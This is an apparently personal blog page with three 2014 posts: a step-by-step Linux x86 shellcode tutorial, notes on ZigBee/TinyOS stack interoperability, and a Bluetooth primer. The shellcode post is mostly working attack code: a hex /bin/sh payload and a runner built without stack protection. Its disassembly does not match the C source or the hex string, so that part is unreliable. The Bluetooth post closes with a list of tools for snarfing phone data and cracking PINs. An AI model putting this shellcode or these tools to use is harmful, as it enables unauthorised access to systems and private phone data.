Wednesday, 29 October 2014

Shellcode



How to write a simple shellcode ...?


1. A  Simple  C  program  for  /bin/sh
#include <unistd.h>

int main(int argc, char*argv[ ])
{
   char *shell[2];

   shell[0] = "/bin/sh";
   shell[1] = NULL;
   execve(shell[0], shell, NULL);
   return 0;
}
2. Type  Command
# gcc shellexpt.c -o  shellexpt

# objdump  -d   ./shellexpt


shellexpt.c  :file format elf32-i386

Disassembly of section .text:

08048074 <_start>:
 8048074:       31 c0      xor     %eax, %eax
 8048076:       b0 46      mov     $0x46, %al
 8048078:       31 db      xor     %ebx, %ebx
 804807a:       31 c9      xor     %ecx, %ecx
 804807c:       eb 16      jmp     8048094 <ender>

0804807e <starter>:
 804807e:       5b         pop     %ebx
 804807f:       31 c0      xor     %eax, %eax
 8048081:       88 43 07   mov     %al, 0x7(%ebx)
 8048084:       89 5b 08   mov     %ebx, 0x8(%ebx)
 8048087:       89 43 0c   mov     %eax, 0xc(%ebx)
 804808a:       b0 0b      mov     $0xb, %al
 804808c:       8d 4b 08   lea     0x8(%ebx), %ecx
 804808f:       8d 53 0c   lea     0xc(%ebx), %edx
 8048092:       cd 80      int     $0x80

08048094 <ender>:
 8048094:       e8 e5 ff ff ff    call   804807e <starter>
 8048099:       2f                das
 804809a:       62 69 6e          bound  %ebp, 0x6e(%ecx)
 804809d:       2f                das
 804809e:       73 68             jae    8048108 <ender+0x74>
 80480a0:       4e                dec    %esi
 80480a1:       41                inc    %ecx
 80480a2:       41                inc    %ecx
 80480a3:       41                inc    %ecx
 80480a4:       41                inc    %ecx
 80480a5:       42                inc    %edx
 80480a6:       42                inc    %edx
 80480a7:       42                inc    %edx
 80480a8:       42                inc    %edx

 3. Collect  hexcode  from the asm  file

 "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb"
 "\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89"
 "\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd"
 "\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f"
 "\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42"
  3. Create  A  shell code  program  by using  this  hexcode
 
/*shell_exec.c*/
#include <unistd.h>

char code[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb"
              "\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89"
              "\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd"
              "\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f"
              "\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42";

int main(int argc, char **argv)
{
/*creating a function pointer*/
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}
4. Compile  and   run the  code

   #gcc  -fno-stack-protector -z execstack  shell_exec.c
    
   #./a.out
5 Result
      Get  a  /bin/sh   shell 
6. Try  more  shellcode  
  
     Jonathan Salwan's  Shellcode  database
  
Shell-code  Jonathan Salwan Database  GoTo

Shell-code  Project  Go To

Shell-code  Python Injector  Released  GoTo    Download 

Shell-code  Tutorials T1  T2

Shell-code  Exploit  DB GoTo

Tuesday, 28 October 2014

XBee IEEE 802.15.4 ZigBee OEM Stack Interoperability Issues with TinyOS IEEE 802.15.4 Stack


  1.  The main Problems of porting the stack over the IEEE 802.15.4 lower layer stack is lack of specification details of hardware and software regarding important aspects of the beacon enabled mode and the cluster tree model.
  2. Synchronization Techniques in Cluster Tree Developments is an another issue. For building a cluster network, synchronization is very much required especailly between the ZR , ZC and ZED if all the devices are working under one PAN ID. Moreover , if a node is not properly sychronized there is a possiblity of collisions in the GTS slots(It provides guaranted time for each device is intent to connect to the network) : Stack Overflow is the result of this problem.
  3. XBee is a ZigBee Alliance Group devices and its using the ZigBee Compaint IEEE 802.15.4 stack for the Wireless Communication. TinyOS is not a ZigBee, but the micaz mote device we are using here is a ZigBee Alliance Group device. That doesnt means that its possible to make communication between these two, for that we need a ZigBee IEEE 802.15.4 Stack in TinyOS for building the ZigBee Protocol Stack in it.
  4. CC2420 Radio chipset which is used to switch the time for transmitting and receiving data throught radio is 192 mico seconds, that is different from the other stack , especially in allianced group devices like OEM.
  5. In addition, the processing power available in the motes microconrtoller revealed to be quite limited to comply with the most demanding IEEE 802.15.4 timing constraints, especailly from small beacon orders (BO < 3) and superframe orders (SO <3). This turns these Superframe configuration impossible to deploy, considering that the mote must also have availablity for processing other task.
  6. ZigBee Protocol stack have some processing limtation in ATMega128RF,only smarter and faster microconrtoller overcome this difficulty. Open ZB forum expect to overcome this in near future.
  7. The deafult TinyOS Scheduler does not support tasks prioritization and non pre-emptive. Typically there are two different kinds of interrupt event in TinyOS: timers and radio, these events are captured by event handler that normally post a task to the FIFO task queue, which significantly impacts the behaviour of the protcol stack.
  8. The interference between IEEE 802.15.4 and 802.15.4 radio channels , confirmed using a FFT spectrum analyser had inpredicatable effects on the resutls.
  9. Physical Layer Related problems.
  10. Interference between radio channels (Overcome the interference between these two standards by using the only IEEE 802.154. channel(channeks 26 in the 2480 MHz frequency band) that is completely outside the IEEE 802.11 frequency Spectrum).
  11. RSSI -based localization in accuracy (Problem Solved in Open ZB).
  1. Synchronized data request/ reply method used in the XBee ZigBee Alliance Group device due to accomadation of the large collection devices in the network.
  2. Timer Slot Registration techniques for a frame in TinyOS and XBee devices is have a lot of difference. Like In TinyOS , DESTINATION device is send frame to the SOURCE device is by using BROADCASTING timeslot channel. But in XBee only BROADCASTING frame is allow to pass through the channel.
  3. TinyOS does'nt have any Super Frame Scheduling Mechanism for handling multiple packet from the SOURCE Devices.
  4. The tinyos stack is NOT multi-lingual nor is it very flexible. You basically compile with a group of defines set that determines exactly what kind of packets one is interested in. This is an artifact of TinyOS motes being extremely resource constrained.
  5. TinyOS not following any accurate simulation model for IEE 802.15.4 and ZigBee protocol focusing on the Guranteed Timse Slot (GTS) mechanism and ZigBee hierarichal routing strategy in becon enabled cluster-tree Wireless Sensor Network.
  6. To implement an energy efficient beacon enabled routing mechansim in TinyOS is really a challenging task.
  7. XBee uses 16 Channels with the band gap of the 5MHz [ 2MHz] and 16 Array orthogonal DSSS for maintaing the dynamic timeslot allocation for frames from the devices.TinyOS or OpenZB doesn't have any kind of mechanism like that and its using Time Division based Frame Synchronization Techniques [TDMA].
  8. ZigBee Compliant IEEE 802.15.4 Stack is differ from depending up on its Specification and Networking Topologies.
  9. In ZigBee Wrieless Sensor Technology mainly three networking topolgies were using for costructing a sensor network. According to the current IEEE802.15.4/ZigBee specification , synchronization techniques in each toplogies is different from one another on beacon enabled mode. OpenZB forum says that, they were successfully resolve this issue by applying an Time Division Based Synchronization Techniques.
  10. OpenZB forum build ZigBee Stack top over a modified IEEE 802.15.4 in which is very much compatable with their stack. So we cant expect that this device is communicate with the exsiting ZigBee Alliance Group device like XBee.
  11. I am Stilll working on OpenZB implemenation in Micaz mote device, because vendors saying that this device is ZigBEE Alliance group device and it have OEM Modified IEEE complaint stack on its bottom layer of the stack. So it can support the ZigBEE protocol stack.
These are some issues facing while building an interoperable ZigBEE Stack over IEEE 802.15.4 -TinyOS -Micaz device. IEEE 802.15.4 ZigBEE Compliant Stack, Synchronization Scheduling Mechanism, Suitable Superframe allocation method for Avoiding the frame collision and Guranteed GTS for devices are some MAJOR ISSUES

Bluetooth Development Essential


A Short range Wireless Communication Standard for End to End device for share  the data between two ends. Like other Short range Wireless Communication  standard, Bluetooth also using an unlicensed 2.4 GHz baseband communication to  Physical Layer. It's have a protocol stack to perform an end to end  application and supports wide  range of application  in different  embedded  devices for short  range  communication . Now  it's  become  an essential  communication standard  in Smart Mobile  and  other devices in the market.  Before  Developing an  application  for  Bluetooth  we  should  have to  know  about it  very well  for  ease the  development .  

Bluetooth  version

   The Bluetooth Special Interest Group (SIG) is the body that oversees the development of Bluetooth standards and the licensing of the Bluetooth technologies and trademarks to manufacturers. The  following  are  some Bluetooth version that  we  are  currently  using  in different  sectors.
Bluetooth Protocol Stack

Baseband + Bluetooth Radio - Physical Layer Operation in Bluetooth or  transmission of data from one end to another.

LMP  -  Link  Management Protocol for to Provide a link to the application  using the Link channel and also participates  the  Multiplexing of channel using  PSM code in Link Layer.

RFCOMM -  RF Virtual COM port for Serial Communication Emulator.

BNEP  -  Bluetooth Network Encapsulation Protocol is help to provide a  network Stack to Bluetooth for doing a SEQPACKET, SOCKSTREAM socket  communication  to  device.

L2CAP - Logical  Link Control  and  Adaptation Protocol   provide a  logical  link connection to the RFCOMM and any other application layer protocol protocol  in the Stack.

OBEX  -Object Exchange Protocol. Its an application Layer protocol to perform  data  exchange  operation  between  devices.

SDP  -  Service  Discovery protocol  is  help  to  acquire  the  information of the  services run  in the  Bluetooth  device.
 
Network topology
 
   Bluetooth have one topology named "Scatternet" which help to build a bluetooth device network, but there have only few implementation is there in practical scenario.  Actually Scatternet is the collection of small net consist of 7   Bluetooth nodes called as piconet. Piconet consists of 7 nodes and each node  perform a direct link to link connection between two node. A node is the host all  other node in the network we can call it as "MASTER node" and a node is  intended to connect to the "MASTER node"  is called as SLAVE node.

Bluetooth  Development  Library

BlueZ :-
   If  you  are   using  Linux  you can  download  from  the  repo  by  using  the  command
      #sudo  apt-get  install  bluez
hcidump:-
        Promiscuous  Sniffer  for  Bluetooth
      #sudo  apt-get  install  bluez-hcidump
Bluecova  :- 
  Bluecova  is a  Java  library  for Bluetooth  Application Development  and it   runs  over  a  Java  Virtual  Machine.

Bluetooth  Hacking Tools

BlueScanner – BlueScanner searches out for Bluetooth-enabled devices. It will try to extract as much information as possible for each newly discovered device. Download BlueScan.
BlueSniff – BlueSniff is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices. Download BlueSniff.
BTBrowser – Bluetooth Browser is a J2ME application that can browse and explore the technical specification of surrounding Bluetooth-enabled devices. You can browse device information and all
supported profiles and service records of each device. BTBrowser works on phones that supports JSR-82 – the Java Bluetooth specification. Download BTBrowser.
BTCrawler -BTCrawler is a scanner for Windows Mobile based devices. It scans for other devices in range and performs service query. It implements the BlueJacking and BlueSnarfing attacks. Download BTCrawler.
Hacking Bluetooth Devices
BlueBugger -BlueBugger exploits the BlueBug vulnerability. BlueBug is the name of a set of Bluetooth security holes found in some Bluetooth-enabled mobile phones. By exploiting those vulnerabilities, one can gain an unauthorized access to the phone-book, calls lists and other private information. Download BlueBugger.
CIHWB – Can I Hack With Bluetooth (CIHWB) is a Bluetooth security auditing framework for Windows Mobile 2005. Currently it only support some Bluetooth exploits and tools like BlueSnarf, BlueJack, and some DoS attacks. Should work on any PocketPC with the Microsoft Bluetooth stack. Download CIHWB.
Bluediving – Bluediving is a Bluetooth penetration testing suite. It implements attacks like Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, has features such as Bluetooth address spoofing, an AT and a RFCOMM socket shell and implements tools like carwhisperer, bss, L2CAP packetgenerator, L2CAP connection resetter, RFCOMM scanner and green plaque scanning mode. Download Bluediving.
Transient Bluetooth Environment Auditor – T-BEAR is a security-auditing platform for Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and various cracking tools. Download T-BEAR.
Bluesnarfer – Bluesnarfer will download the phone-book of any mobile device vulnerable toBluesnarfing. Bluesnarfing is a serious security flow discovered in several Bluetooth-enabled mobile phones. If a mobile phone is vulnerable, it is possible to connect to the phone without alerting the owner, and gain access to restricted portions of the stored data. Download Bluesnarfer.
BTcrack – BTCrack is a Bluetooth Pass phrase (PIN) cracking tool. BTCrack aims to reconstruct the Passkey and the Link key from captured Pairing exchanges. Download BTcrack.
Blooover II – Blooover II is a J2ME-based auditing tool. It is intended to serve as an auditing tool to check whether a mobile phone is vulnerable. Download Blooover II.
BlueTest – BlueTest is a Perl script designed to do data extraction from vulnerable Bluetooth-enabled devices. Download BlueTest.
BTAudit – BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices. Download BTAuding.